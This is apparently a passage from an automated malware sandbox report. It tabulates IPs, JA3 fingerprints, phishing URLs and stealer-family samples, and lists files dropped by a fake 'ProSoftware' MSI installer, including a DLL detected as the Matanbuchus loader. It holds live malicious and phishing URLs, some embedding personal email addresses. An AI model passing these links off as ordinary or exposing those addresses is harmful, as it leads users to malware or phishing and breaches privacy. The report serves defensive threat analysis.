	https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWA	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://app.pandadoc.com/document/v2?token=2126fee3194112970cb23c51d0c56249323ace2b	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJ	Get hash	malicious	Unknown	Browse	188.68.242.180
	kingdom.ps1	Get hash	malicious	Atlantida Stealer	Browse	185.234.216.181
	cabbage.exe	Get hash	malicious	Atlantida Stealer	Browse	185.234.216.181
CLOUDFLARENETUS	https://wrx.dzpvwobr.ru/	Get hash	malicious	Unknown	Browse	172.67.211.61
	https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29t	Get hash	malicious	HTMLPhisher	Browse	104.26.9.44
	https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KL	Get hash	malicious	Unknown	Browse	104.18.95.41
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	https://t.ly/DDbri	Get hash	malicious	Unknown	Browse	104.20.6.133
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#alissa.bessette@eastwesttea.com	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	104.19.229.21
	https://hujalconcretos.com/npp	Get hash	malicious	Unknown	Browse	104.18.11.207
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	https://displaysolution.ca/advertising-inflatable-tents.html	Get hash	malicious	Unknown	Browse	104.21.79.176

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.21.40.3
	https://wrx.dzpvwobr.ru/	Get hash	malicious	Unknown	Browse	104.21.40.3
	https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29t	Get hash	malicious	HTMLPhisher	Browse	104.21.40.3
	https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KL	Get hash	malicious	Unknown	Browse	104.21.40.3
	https://t.ly/DDbri	Get hash	malicious	Unknown	Browse	104.21.40.3
	https://inovamora.com/team/index.html	Get hash	malicious	HTMLPhisher	Browse	104.21.40.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.21.40.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.40.3
	https://hujalconcretos.com/npp	Get hash	malicious	Unknown	Browse	104.21.40.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.40.3
37f463bf4616ecd445d4a1937da06e19	resume.docx.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175
	JSWunwO4rS.lnk	Get hash	malicious	LummaC Stealer	Browse	185.234.216.175
	apilibx64.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	185.234.216.175
	Fortexternal.exe	Get hash	malicious	Unknown	Browse	185.234.216.175
	Setup.msi	Get hash	malicious	Unknown	Browse	185.234.216.175
	Document_PDF.vbs	Get hash	malicious	FormBook	Browse	185.234.216.175
	Pr9cqW75nY.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175
	G3vWD786PN.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175
	hTXtTJXdLt.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175
	fqufh5EOJr.lnk	Get hash	malicious	Unknown	Browse	185.234.216.175

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Installer\MSICA2D.tmp	fes.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	merd.msi	Get hash	malicious	Unknown	Browse
	medk.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	lavi.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	Document-v09-42-38.js	Get hash	malicious	BruteRatel	Browse
	Document-v05-53-20.js	Get hash	malicious	BruteRatel, Latrodectus	Browse
	FW3x3p4eZ5.msi	Get hash	malicious	Bazar Loader, BruteRatel	Browse
	Document-19-06-38.js	Get hash	malicious	BruteRatel	Browse
	Document-19-06-38.js	Get hash	malicious	BruteRatel	Browse

Created / dropped Files

C:\Config.Msi\47ccdd.rbs

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	5.724925883514744
Encrypted:	false
SSDEEP:	24:GbOg4BtTUTXNT6TYggmbtMpUUUFPzloDhiSVzAvQs+D6:GaSTQ0KsePiD8SVo3+D6
MD5:	98A3004291552F9D602FCC634F0668D6
SHA1:	667B802CF81CE0117EA7CEFCD9A3E77BD66A3E20
SHA-256:	4296BE9D5596A8FA12B829ACD833B798437B86E68633B521DB3BF402FDE2764D
SHA-512:	872F5BEF8A543D992E55F283831DDCECC1670CA96E36078A2E024BE132049A888AC4E1D74446953CF7B366B65CB4B5F84D1C47C50C15E9B277F7ABCDC0B77D1E
Malicious:	false
Preview:	...@IXOS.@.....@s..Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@........CreateFolders..Creating folders..Folder: [1]#.8.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..'.C:\Users\user\AppData\Roaming\silver\....2.C:\Users\user\AppData\Roaming\silver\libcurl.dll....WriteRegistryValues..Writing system registr

C:\Users\user\8f08\724536\724536.winmd

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	319488
Entropy (8bit):	6.566831510478186
Encrypted:	false
SSDEEP:	6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
MD5:	AD47745AB2AEB60334491BA213BDCF73
SHA1:	8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
SHA-256:	394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
SHA-512:	9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\724536\724536.winmd, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..Xn..[o..Xn..]oL.Xn..\o..Xn.Y]o..Xn.Y\o..Xn.Y[o..Xn..Yo..Xn..Yn..Xn.Y]o..Xn.YXo..Xn.YZo..XnRich..Xn........PE..L...%.Rg.........."!...&......L.....{.........................................O.....$A....@.........................@...........x.....O.h.....................O.PK......................................@............................................text...`........................... ..`.rdata..............................@..@.data...\.J.........................@....reloc..PK....O..L..................@..B.rsrc...h.....O.....................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\silver\libcurl.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	319488
Entropy (8bit):	6.566831510478186
Encrypted:	false
SSDEEP:	6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
MD5:	AD47745AB2AEB60334491BA213BDCF73
SHA1:	8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
SHA-256:	394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
SHA-512:	9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..Xn..[o..Xn..]oL.Xn..\o..Xn.Y]o..Xn.Y\o..Xn.Y[o..Xn..Yo..Xn..Yn..Xn.Y]o..Xn.YXo..Xn.YZo..XnRich..Xn........PE..L...%.Rg.........."!...&......L.....{.........................................O.....$A....@.........................@...........x.....O.h.....................O.PK......................................@............................................text...`........................... ..`.rdata..............................@..@.data...\.J.........................@....reloc..PK....O..L..................@..B.rsrc...h.....O.....................@..@................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI4D8A.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E648317-E941-449A-AF72-39AC6882CB87}, Number of Words: 10, Subject: ProSoftware, Author: Blueray INC, Name of Creating Application: ProSoftware, Template: ;1033, Comments: Set database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	978944
Entropy (8bit):	6.982712024960584
Encrypted:	false
SSDEEP:	12288:xtu6QnN5MN+Y9x0ECIgYOx5fnL/tYi8OBZr7AicRXrdq3u8bJk:xtuxnNTY9x0ECIgYmfLVYeBZr7AM
MD5:	18D5F1A9BFB3E34FF25BBDA3F05D386F
SHA1:	4B4394E1C8D91B4D7D1BEC0C4A443FA08243994F
SHA-256:	55A33165FBA0F7134E4CA482E0951C143B04E6A0E78FDC5F702E74E08BFD9249
SHA-512:	050747B91C89396A945E3A7E4BBE10F16CE2627D531DB087DDEF86817FBD9FD1C4E067D3CBB522380D2B1A5F50696797064A19E78DD5A8ABC5A35C03DBE843FE
Malicious:	false
Preview:	......................>.......................................................D.......`......................................./...0.......................................................................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...........F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSICA2D.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fes.msi, Detection: malicious, Browse Filename: zdi.txt.msi, Detection: malicious, Browse Filename: merd.msi, Detection: malicious, Browse Filename: medk.msi, Detection: malicious, Browse Filename: lavi.msi, Detection: malicious, Browse Filename: Document-v09-42-38.js, Detection: malicious, Browse Filename: Document-v05-53-20.js, Detection: malicious, Browse Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse Filename: Document-19-06-38.js, Detection: malicious, Browse Filename: Document-19-06-38.js, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSICC41.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSICC71.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSICCA1.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSICD0F.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1733
Entropy (8bit):	5.5641511938395345
Encrypted:	false
SSDEEP:	24:GbTg4BtTUTXNhu6SjIbopWzlzbSxtcZpUXUFP3bMJG9Q1EgcqvSDhiS/zJgoDI:GfSTBA1spSx63P3wUmEVD8S/HDI
MD5:	1DCFD320A3DAE54D5B24F10BE520138A
SHA1:	9952FDD310D24678CAEF935C3DE36972D061D990
SHA-256:	8A667B951405105260795F4D73CFB9DEC61BD27E12304FC2964F981292915296
SHA-512:	3E3000C62FD239A97AC0DA5020AC5AC27385FD5CBE2D2BC3DC5F3FEF5ACE53034316E9A8E85EBE03C12DDAA2F36B364AF6BE55F91F423B805DB148D30DAD2CA8
Malicious:	false
Preview:	...@IXOS.@.....@s..Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}8.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB},.01:\Software\Blueray INC\ProSoftware\Version.@.......@.....@.....@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}2.C:\Users\user\AppData\Roaming\silver\libcurl.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".8.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@....

C:\Windows\Installer\inprogressinstallinfo.ipi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5674012917132396
Encrypted:	false
SSDEEP:	48:y8PhTuRc06WXOGFT55jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:dhT1IFTbCybvwCkFWEyb
MD5:	703CA6AF35FA579AFCB08CB58B7132D0
SHA1:	17586DF0FBB3C974023C9B6268118C2E1F014996
SHA-256:	771E59F57576B381856CC9FEF46DAB2777E3B27B2EC9B95B88DA94FFE9A85C90
SHA-512:	20CE633AF16607337A36083E0E5A279520EE7D75A8E07CFC6EF67E680552D7E9B940C26EC2A87715A80DEB0873A756C9CBC4F15F402624E9FB7D18ADE8E93F50
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF0ABDA50757466816.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF139C3824A796FB00.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2560516444161327
Encrypted:	false
SSDEEP:	48:SiLuxNvGFXOHT5+jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:5LBKTsCybvwCkFWEyb
MD5:	D81ED92415EFD1F2A65B508309B9B493
SHA1:	43316AB0EE851A6238225094C2A65C45FAA533C6
SHA-256:	FB863B95E7E2AB2C8C043B3311D901EA022203D48C402B5D8A2102C61D1C25C7
SHA-512:	72DEF9B84480F2BEA361B5BF28444D2F066AA3EFE9F4EF8F8550D73E049DF897ACDBCA6E5B964427238803D08E987CAA598678120D634CBC5A7A8E15374B3545
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3CBE85FA72F5AFFF.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5674012917132396
Encrypted:	false
SSDEEP:	48:y8PhTuRc06WXOGFT55jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:dhT1IFTbCybvwCkFWEyb
MD5:	703CA6AF35FA579AFCB08CB58B7132D0
SHA1:	17586DF0FBB3C974023C9B6268118C2E1F014996
SHA-256:	771E59F57576B381856CC9FEF46DAB2777E3B27B2EC9B95B88DA94FFE9A85C90
SHA-512:	20CE633AF16607337A36083E0E5A279520EE7D75A8E07CFC6EF67E680552D7E9B940C26EC2A87715A80DEB0873A756C9CBC4F15F402624E9FB7D18ADE8E93F50
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF50727231CB9281C5.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5126340D4E9A05AC.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5C05D216F3EDB6F8.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2560516444161327
Encrypted:	false
SSDEEP:	48:SiLuxNvGFXOHT5+jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:5LBKTsCybvwCkFWEyb
MD5:	D81ED92415EFD1F2A65B508309B9B493
SHA1:	43316AB0EE851A6238225094C2A65C45FAA533C6
SHA-256:	FB863B95E7E2AB2C8C043B3311D901EA022203D48C402B5D8A2102C61D1C25C7
SHA-512:	72DEF9B84480F2BEA361B5BF28444D2F066AA3EFE9F4EF8F8550D73E049DF897ACDBCA6E5B964427238803D08E987CAA598678120D634CBC5A7A8E15374B3545
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8859EEA57FAE6F12.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF93D759808F85E887.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5674012917132396
Encrypted:	false
SSDEEP:	48:y8PhTuRc06WXOGFT55jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:dhT1IFTbCybvwCkFWEyb
MD5:	703CA6AF35FA579AFCB08CB58B7132D0
SHA1:	17586DF0FBB3C974023C9B6268118C2E1F014996
SHA-256:	771E59F57576B381856CC9FEF46DAB2777E3B27B2EC9B95B88DA94FFE9A85C90
SHA-512:	20CE633AF16607337A36083E0E5A279520EE7D75A8E07CFC6EF67E680552D7E9B940C26EC2A87715A80DEB0873A756C9CBC4F15F402624E9FB7D18ADE8E93F50
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9DB77AF3876EB429.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.13857270749497835
Encrypted:	false
SSDEEP:	48:fQkTEOfDS4OfgOfDS4OfdAErCyoq9FuSicI:2ybXybvwCkFWc
